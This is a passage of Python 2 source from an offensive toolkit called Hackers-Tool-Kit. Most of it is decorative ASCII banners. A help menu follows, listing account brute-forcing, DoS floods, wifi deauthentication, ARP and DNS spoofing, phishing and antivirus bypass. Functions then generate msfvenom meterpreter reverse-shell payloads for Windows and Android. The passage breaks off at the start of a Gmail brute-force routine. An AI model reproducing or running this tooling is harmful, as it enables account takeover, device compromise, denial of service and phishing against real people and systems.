|\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - type ? for help - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner8(): - print """ - type ? for help\033[91m - -@@@ /$$ /$$ @@@ -@@@ | $$ | $$ @@@ -@@! | $$ | $$ @@! -!@! | $$$$$$$$ !@! -!!@ | $$__ $$ !!@ -!!! | $$ | $$ !!! -!!: | $$ | $$ !!: -:!: |__/ |__/ :!: -@@@ @@@\033[94m -@@@ @@@ -@@! @@! -!@! /$$$$$$$$ !@! -!!@ |__ $$__/ !!@ -!!! | $$ !!! -!!: | $$ !!: -:!:---------------| $$---------------:!: -@@@ | $$ @@@ -@@@ | $$ @@@ -@@! |__/ @@! -!@! !@!\033[91m -!!@ !!@ -!!! /$$ /$$ !!! -!!: | $$ /$$/ !!: -:!: | $$ /$$/ :!: -@@@ | $$$$$/ @@@ -@@@ | $$ $$ @@@ -@@! | $$\ $$ @@! -!@! | $$ \ $$ !@! -!!@ |__/ \__/ !!@ -!!! !!! -!!: !!: -:!: :!:\033[92m - :: :: -: @tuf_unkn0wn :\033[0m -""" -def mainbanner9(): - print """ -\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ -║ ║ -\033[33m║ ║ -║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ -\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ -║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ -\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ -║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ -\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ -║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ -\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ -║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ -\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ -║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ -\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ -║\033[0m █ ▐ ▀ █ ▐ \033[95m║ -\033[35m║\033[0m ▐ ▐ \033[35m║ -║ ║\033[1;31m -╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m - type ? for help - """.decode('utf-8') - -def mainbanner10(): - print """\033[0m - ░░░▓█▒░▒▒▒▓▓░ - ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ - ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ - ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ - ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ - ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ - ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ - ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ - ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ - ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ - ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ - ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ - ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ - ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ - ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ - ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ - ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ - ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ - ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ - ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ - ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ - ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ - ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ - ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ - ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ - ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ - ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ - ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ - ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ - ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ - ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ - ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ - ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ - ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ - ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ - ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ - ░█▓▓▓▓▓▓███████▓██▓██░ - ░██▓▓▓████████████████░░░ - ░▓▓▓▓▓███████▓█▓████████░ ░░░ - ░░░█▓█████████████████████████▓▓▓▒░░░░░░ - ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ - ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ - ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ - ░░▓█▓█▓█████████████████████████████░░ - \033[0m""".decode('utf-8') -def mainbanner11(): - print """\033[91m - ██████╗ ██████╗ ██████╗ - ██╔════╝ ██╔════╝ ██╔════╝ - ███████╗ ███████╗ ███████╗ - ██╔═══██╗██╔═══██╗██╔═══██╗ - ╚██████╔╝╚██████╔╝╚██████╔╝ - ╚═════╝ ╚═════╝ ╚═════╝ - ░░░░ ░░░░░ - ░▒███████▓▒░░ ░░░████████▓░░░ - ░▓████████████▒░░ ░░█████████████░░ - ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ - ░ ░██████▒░ ░░░░███████ ░░ - ░░███████░░ ░░██████▓░ - ░███████░░ ░▒██████▒ - ░░░░ ░░███████░░░███████▒░ ░░░ - ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ - ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ - ░▒██████████████▒████████▒██████████████░░ - ░░██████████████▒░███▒▒▒█████████████░░ - ░░░░▓████████░█░▓▓▒████████▒░░░░░ - ░░████████▓░██░████████▒░░░ - ░░▒██████░▒▒░░▒░░██████░ - ░░█████████▓░█░████▓███▓░ - ░▒█▓░▒██████▒███████░░█▓░ - ░░░███████████████████▓░░ - ░▒▓████████████████▒░ - ░░▒███████████████▓▒░ - ░▒█████▓██████░░ - ░██████████░ - @tuf_unkn0wn ░█████████▒ type ? for help - █████████░░ - ░░████████░░ - ░▓█████▓░ - ░▓████▒░ - ░░████░ - ░░░▒██░░ - ░█▓░ - ░░▓░░ - ░░░░░ - ░░ - \033[0m""".decode('utf-8') -def mainbanner12(): - print """\033[91m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner13(): - print """\033[92m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner14(): - print """\033[34m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner15(): - print """\033[93m - __ _ - _wr"" "-q__ - _dP 9m_ - _#P 9#_ - d#@ \033[92mtype ? for help\033[93m 9#m - d## ### - J### ###L - {###K J###K - ]####K ___aaa___ J####F - __gmM######_ w#P"" ""9#m _d#####Mmw__ - _g##############mZ_ __g##############m_ - _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ - a###"" ,Z"#####@" '######"\g ""M##m - J#@" 0L "*## ##@" J# *#K - #" `# "_gmwgm_~ dF `#_ -7F "#_ ]#####F _dK JE -] *m__ ##### __g@" F - \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m - ` 0######_ ' - _0########_ - . _d#####^#####m__ , - "*w_________am#####P" ~9#####mw_________w*" - ""9@#####@M"" ""P@#####@M"" -\033[92m - ██░ ██ ▄▄▄█████▓ ██ ▄█▀ - ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ - ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ - ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ - ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ - ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ - ▒ ░▒░ ░ ░ ░ ░▒ ▒░ - ░ ░░ ░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░\033[0m - """.decode('utf-8') -def mainbanner16(): - print """\033[91m - :PB@Bk: - ,jB@@B@B@B@BBL. - 7G@B@B@BMMMMMB@B@B@Nr - :kB@B@@@MMOMOMOMOMMMM@B@B@B1, - :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. - 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr - G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S - @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ - B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B - @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ - @@OLB. BNB@MMOMOMM@BEB rBjM@B - @@ @ M OBOMOMM@q M .@ @@ - @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B - @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ - B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B - @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ - B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M - J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv - iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: - . B@M@B@MMM@B@B@B@MMM@@@M@B - @B@B.i@MBB@B@B@@BM@::B@B@ - B@@@ .B@B.:@B@ :B@B @B@O - :0 r@B@ B@@ .@B@: P: - vMB :@B@ :BO7 - ,B@B\033[0m - - \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m - ███████████████████████████ - type █?█ for help - ███ - \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ - ██ ██ \033[0m███\033[31m ██ ██▀ - ██ ██ \033[0m███\033[31m ██▄██ - ████████ \033[0m███\033[31m █████ - ██ ██ \033[0m███\033[31m ██ ██▄ - ██ ██ \033[0m███\033[31m ██ ██▄ - ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m - """.decode('utf-8') -def mainbanner17(): - print """ - - .---. - |---| - type |-\033[32m?\033[0m-| for help - |---| - .---^ - ^---. - :___________: - \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m - ███ ███ | |//| ███ ▄███▀ - ███ ███ | |//| ███▐██▀ - ███▄▄▄▄███ | |//| █████▀ - ███▀▀▀▀███ | |//| █████▄ - ███ ███ | |//| ███▐██▄ - ███ ███ | |.-| ███ ▀███▄ - \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m - \***/ - \*\033[91m/\033[31m - V\033[0m - """.decode('utf-8') -def mainbanner18(): - print """ - Type \033[31m?\033[0m For\033[31m Help\033[0m -\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ -║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ -║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ -║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m -║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ -║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ -╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ - """.decode('utf-8') -def mainbanner19(): - print """\033[31m - # # - # # - %# \033[0m@tuf_unkn0wn\033[31m ## - ,%/ /%, - %## ##% - &%## ##%& - ,%%#####/. ,/#####%%, - %&%%#####/ \033[0m████\033[31m /#####%%&% - .&&%%%&& \033[0m████\033[31m &&%%%&&. - /&%( \033[0m████\033[31m (%&( - \033[0m████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - \033[31m██████\033[31m type \033[0m█\033[31m??\033[0m█ \033[31mfor help ██████ -██ \033[0m██████████████████████████████\033[31m ██ -███████ \033[0m██████████████████████████████\033[31m ███████ -██ ██ \033[0m████ \033[31m ██ ██ - ██████ \033[0m████ \033[31m ██████ - ▒ ▓▒ ▒ ▒ ▓▒ ▒ - ░ ▒ ░ ██████ ░ ▒ ░ - ░ ░ ██ ░ ░ - ███████ - ██ ██ - ██████ - ▒ ▓▒ ▒ - ░ ▒ ░ - ░ ░\033[0m - """.decode('utf-8') -def mainbanner20(): - print """ - - - ██╗\033[31m██╗ ██╗\033[0m██╗ ██╗\033[92m████████╗\033[0m██╗ ██╗\033[34m██╗ ██╗\033[0m██╗ - ██╔╝\033[31m██║ \033[31m██║\033[0m╚██╗ ██╔╝\033[92m╚══\033[92m██╔══╝\033[0m╚██╗ ██╔╝\033[34m██║ ██╔╝\033[0m╚██╗ -██╔╝ \033[31m███████║ \033[0m╚██╗██╔╝\033[92m ██║ \033[0m╚██╗██╔╝\033[34m █████╔╝ \033[0m╚██╗ -╚██╗ \033[31m██╔══██║ \033[0m██╔╝╚██╗ \033[92m██║ \033[0m ██╔╝╚██╗\033[34m ██╔═██╗\033[0m ██╔╝ - ╚██╗\033[31m██║ ██║\033[0m██╔╝ ╚██╗\033[92m ██║ \033[0m ██╔╝ ╚██╗\033[34m██║ ██╗\033[0m██╔╝ - ╚═╝\033[31m╚═╝ ╚═╝\033[0m╚═╝ ╚═╝\033[92m ╚═╝ \033[0m ╚═╝ ╚═╝\033[34m╚═╝ ╚═╝\033[0m╚═╝ - Created by @tuf_unkn0wn type ? for help - - """.decode('utf-8') -def mainbanner21(): - os.system("cat /root/hackers-tool-kit/tools/venombanner.txt") - - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,21) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() - if num == 9: - mainbanner9() - if num == 10: - mainbanner10() - if num == 11: - mainbanner11() - if num == 12: - mainbanner12() - if num == 13: - mainbanner13() - if num == 14: - mainbanner14() - if num == 15: - mainbanner15() - if num == 16: - mainbanner16() - if num == 17: - mainbanner17() - if num == 18: - mainbanner18() - if num == 19: - mainbanner19() - if num == 20: - mainbanner20() - if num == 21: - mainbanner21() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -reboot : reboot hackers-tool-kit -update : update the hackers-tool-kit -clear : clears screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -phpload : make a php reverse_tcp payload and start it in a multi handler -pyload : make a python reverse_tcp payload and start it in a multi handler -foxhis : gather firefox history from privileged javascript shell -rhawk : run the RED_HAWK script (info gathering tool) -nano : open nano text editor -compilec: compile a c file -dnsspoof: dns spoofing [type dnsspoofall to spoof entire subnet] -htk-lite: run a lighter version of hackers-tool-kit -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' 